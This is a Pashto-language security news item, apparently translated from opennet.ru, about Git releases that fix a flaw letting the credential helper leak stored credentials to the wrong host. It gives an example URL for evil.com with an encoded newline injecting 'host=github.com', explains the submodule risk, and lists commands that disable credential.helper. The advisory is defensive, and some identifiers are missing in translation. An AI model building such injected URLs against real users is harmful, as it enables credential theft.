د توزیع شوي سرچینې کنټرول سیسټم اصلاحي خپرونه Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 and 2.17.4, in کوم چې له منځه یوړل () په سمبالونکي کې ""، کوم چې د غلط کوربه ته د اسنادو لیږلو لامل کیږي کله چې د ګیټ پیرودونکی د ځانګړي فارمیټ شوي URL په کارولو سره ذخیره ته لاسرسی ومومي چې د نوي لاین کرکټر لري. زیانمنتیا د بل کوربه څخه د اعتباراتو تنظیم کولو لپاره کارول کیدی شي ترڅو د برید کونکي لخوا کنټرول شوي سرور ته واستول شي.
کله چې یو یو آر ایل مشخص کړئ لکه "https://evil.com؟%0ahost=github.com/"، د اعتبار وړ اداره کونکی کله چې د کوربه evil.com سره وصل شي د github.com لپاره مشخص شوي د تصدیق پیرامیټونه تیر کړي. ستونزه هغه وخت رامینځته کیږي کله چې عملیات ترسره کوي لکه "git clone"، په شمول د فرعي ماډلونو لپاره د URL پروسس کول (د مثال په توګه، "git submodule update" به په اتوماتيک ډول د ذخیره کولو څخه د gitmodules فایل کې مشخص شوي URLs پروسس کړي). زیان په داسې شرایطو کې خورا خطرناک دی چیرې چې پراختیا کونکی د URL لیدلو پرته ذخیره کلون کوي ، د مثال په توګه ، کله چې د فرعي ماډلونو سره کار کوي ، یا په سیسټمونو کې چې اتوماتیک کړنې ترسره کوي ، د مثال په توګه ، د بسته بندۍ سکریپټونو کې.
په نوي نسخو کې د زیان منونکو مخنیوي لپاره د اعتباري تبادلې پروتوکول له لارې لیږدول شوي هر ارزښتونو کې د نوي کریکټر تیر کول. د توزیع لپاره، تاسو کولی شئ په پاڼو کې د بسته بندي تازه معلوماتو خوشې کول تعقیب کړئ , , , , , , .
د ستونزې د مخنیوي لپاره د حل په توګه credential.helper مه کاروئ کله چې عامه زیرمو ته لاسرسی ومومئ او د غیر چیک شوي ذخیره کولو سره په "--recurse-submodules" حالت کې "git clone" مه کاروئ. د credential.helper هینډلر په بشپړ ډول غیر فعالولو لپاره، کوم چې کوي او د پاسورډونو بیرته ترلاسه کول ، ساتل یا د پاسورډونو سره فایل، تاسو کولی شئ کمانډ وکاروئ:
git config --unset credential.helper
git config --global --unset credential.helper
git config --system --unset credential.helper
سرچینه: opennet.ru